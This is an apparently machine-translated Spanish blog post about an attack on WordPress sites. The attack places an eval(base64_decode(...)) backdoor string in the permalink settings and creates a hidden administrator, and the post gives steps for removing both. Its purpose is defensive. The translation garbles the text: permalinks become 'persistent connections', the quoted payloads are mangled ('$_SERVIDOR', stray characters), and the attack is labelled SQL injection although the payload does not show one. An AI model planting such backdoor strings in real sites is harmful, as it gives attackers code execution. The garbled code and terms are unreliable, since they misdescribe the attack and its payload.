Inyección SQL de WordPress - Ataques recientes
Un ataque SQL reciente afectó a varios sitios que inyectan código en su sitio. Esta inyección de MySQL afecta sus conexiones persistentes, haciéndolas inútiles. Por lo tanto, la URL de la publicación de tu blog no funcionará. Como Andy Soward nos lo señaló, muchos blogs de WordPress se han visto afectados por este ataque.
Como resultado de este ataque, se agregó uno de los siguientes códigos a su estructura de conexión persistente:
% & ({$ {eval (base64_decode ($ _SERVIDOR (HTTP_REFERER)))}} |. +) &%
?? /% & (% 7B $% 7Beval (base64_decode ($ _ SERVIDOR% 5BHTTP_EXECCODE% 5D))% 7D% 7D |. +) &%
Estos enlaces incluyen todos los enlaces permanentes en su sitio y solo se pueden cambiar después de la eliminación manual.
Para resolver este problema, visite:
Ajustes > Conexiones permanentes y elimina el código antiguo y reemplaza tu código predeterminado.
Lo siguiente que debe hacer es ir al usuario. Verás que hay muchos administradores. No verá su nombre en la lista, pero verá un aumento en los números. Entonces, todo lo que tiene que hacer es mirar a todos los usuarios y encontrar el último usuario registrado. Pase el cursor sobre el usuario y tome el enlace. Cambie el ID de usuario = código agregando 1 al número. Entonces, si el último usuario que vio fue el usuario # 2, agregue 1 y haga 3. Debería encontrar que el administrador oculto tiene un código extraño como nombre. Elimine el código y conviértalo en un suscriptor. Luego regresa y bórralo.
Eso debería funcionar. También puede eliminarlo yendo a su PHPMyAdmin. Porque allí verás a los usuarios.
Solo queríamos publicar esto lo antes posible para que nuestros usuarios puedan obtener la actualización. Asegúrate de que tu blog no esté infectado. Esperamos que WordPress sea lanzado pronto.
Además, si no ha implementado algunas de estas medidas para proteger su área administrativa de WordPress.
Deja una respuesta